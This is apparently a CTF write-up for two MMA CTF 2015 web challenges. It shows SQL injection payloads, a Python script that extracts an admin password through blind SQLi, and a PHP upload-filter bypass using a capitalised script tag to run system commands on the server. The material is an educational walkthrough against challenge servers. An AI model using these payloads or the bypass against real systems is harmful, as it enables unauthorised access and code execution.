MMA CTF 2015 - Login as admin! (30)

On this challenge I took an approach that was probably over-engineered. Used Blind SQLi to find the password of the admin user.


You can login with 'test/test' credentials, which gives you this output:

You are test user.
logout

Let's try logging in with the admin' user.

Initially tried a simple sql injection and it worked immediately:

Username: admin' --

This output was provided, saying we needed to go further by finding the password for the user:

Congratulations!!
You are admin user.
The flag is your password!
logout

This worked without setting the password field, so this makes things easy. Didn't want to attempt dumping the password or joining with the username. So instead went the Blind SQLi route. First tried the initial effort by running:

admin' and password like '%' --
> Success!
admin' and password like 'MMA{%' --
> Success!
admin' and password like 'abcd%' --
> Expected Failure.

Now that we have that out of the way, let's write a python client!

import sys
import requests
import random
import string

url = "http://arrive.chal.mmactf.link/login.cgi"
injection = "admin' and password like '{}' --"

allChars = string.lowercase

solution = "MMA{"

def found(c):
  print "Found! :: {}".format(c)
  print solution

while len(solution) < 80:
  for c in allChars:
    print 'Attempt: {}'.format(c)
    content = requests.post(url, {
      "username": injection.format(solution + c + "%")
    }).content
    if 'invalid' not in content:
      solution += c
      found(c)
      break
    elif c == 'z':
      solution += '_'
      found(c)

After a few cycles, this prints out:

  MMA{cats_alice_band}

MMA 1st CTF 2015 - Uploader (100)

This was one I went back and forth to. The CTF had a few LFI vulnerabilities featured in their challenges. This was purely focused on one.
The Description looked something like this:

This uploader deletes all /<\?|php/. So you cannot run php.

http://recocta.chal.mmactf.link:9080/
http://recocta.chal.mmactf.link:9081/ (Mirror 1)
http://recocta.chal.mmactf.link:9082/ (Mirror 2)
http://recocta.chal.mmactf.link:9083/ (Mirror 3)
You can only upload files whose name is matched by /^[a-zA-Z0-9]+\.[a-zA-Z0-9]+$/.

So it sanitizes the content of your upload by stripping "php" & "?". This makes it so you cannot do "<php" or "<?" to start php interpretation.

At first I tried a few different variations on those beginning tokens, with spaces, escapes & html codes etc.

If you look up beginnings for php, you'll find a special one written in html: https://wiki.php.net/rfc/remove_alternative_php_tags

So now we can write a file such as this:

<script language=php> echo "testing"; </script>

Looks like the file didn't parse correctly, but it also looks like it stripped php, just like the regex shows.

Let's try capitalizing it so it reads:

<script language=PHP> echo "testing"; </script>

Sure enough, we upload this, and it works!

Now we need to do something more important with the payload we upload. Let's try finding the flag! Grep should do the trick!

<script language=PHP> echo system("egrep -rnis 'MMA\{' /"); </script>

Using 'MMA{' as the prefix to the flag seemed like a safe bet, searching all files starting from root.

/flag:1:MMA{you can run php from script tag} /flag:1:MMA{you can run php from script tag}

Flag: MMA{you can run php from script tag}